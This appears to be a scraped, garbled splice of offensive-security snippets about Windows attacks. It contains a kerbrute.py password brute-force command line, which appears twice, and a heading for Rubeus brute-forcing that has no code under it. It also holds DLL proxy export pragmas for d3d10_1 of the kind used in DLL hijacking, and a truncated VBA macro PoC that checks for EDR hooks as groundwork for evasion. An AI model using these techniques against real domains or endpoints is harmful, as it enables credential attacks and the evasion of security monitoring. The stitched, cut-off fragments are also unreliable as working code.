With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
#pragma comment(linker,"/export:D3D10CompileEffectFromMemory=d3d10_1_orig.D3D10CompileEffectFromMemory,@1") | |
#pragma comment(linker,"/export:D3D10CompileShader=d3d10_1_orig.D3D10CompileShader,@2") | |
#pragma comment(linker,"/export:D3D10CreateBlob=d3d10_1_orig.D3D10CreateBlob,@3") | |
#pragma comment(linker,"/export:D3D10CreateDevice1=d3d10_1_orig.D3D10CreateDevice1,@4") | |
#pragma comment(linker,"/export:D3D10CreateDeviceAndSwapChain1=d3d10_1_orig.D3D10CreateDeviceAndSwapChain1,@5") | |
#pragma comment(linker,"/export:D3D10CreateEffectFromMemory=d3d10_1_orig.D3D10CreateEffectFromMemory,@6") | |
#pragma comment(linker,"/export:D3D10CreateEffectPoolFromMemory=d3d10_1_orig.D3D10CreateEffectPoolFromMemory,@7") | |
#pragma comment(linker,"/export:D3D10CreateStateBlock=d3d10_1_orig.D3D10CreateStateBlock,@8") | |
#pragma comment(linker,"/export:D3D10DisassembleEffect=d3d10_1_orig.D3D10DisassembleEffect,@9") | |
#pragma comment(linker,"/export:D3D10DisassembleShader=d3d10_1_orig.D3D10DisassembleShader,@10") |
Private Declare PtrSafe Function GetModuleHandleA Lib "KERNEL32" (ByVal lpModuleName As String) As LongPtr | |
Private Declare PtrSafe Function GetProcAddress Lib "KERNEL32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr | |
Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long) | |
'VBA Macro that detects hooks made by EDRs | |
'PoC By Juan Manuel Fernandez (@TheXC3LL) based on a post from SpecterOps (https://posts.specterops.io/adventures-in-dynamic-evasion-1fe0bac57aa) | |
Public Function checkHook(ByVal target As String, hModule As LongPtr) As Integer | |
Dim address As LongPtr |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module: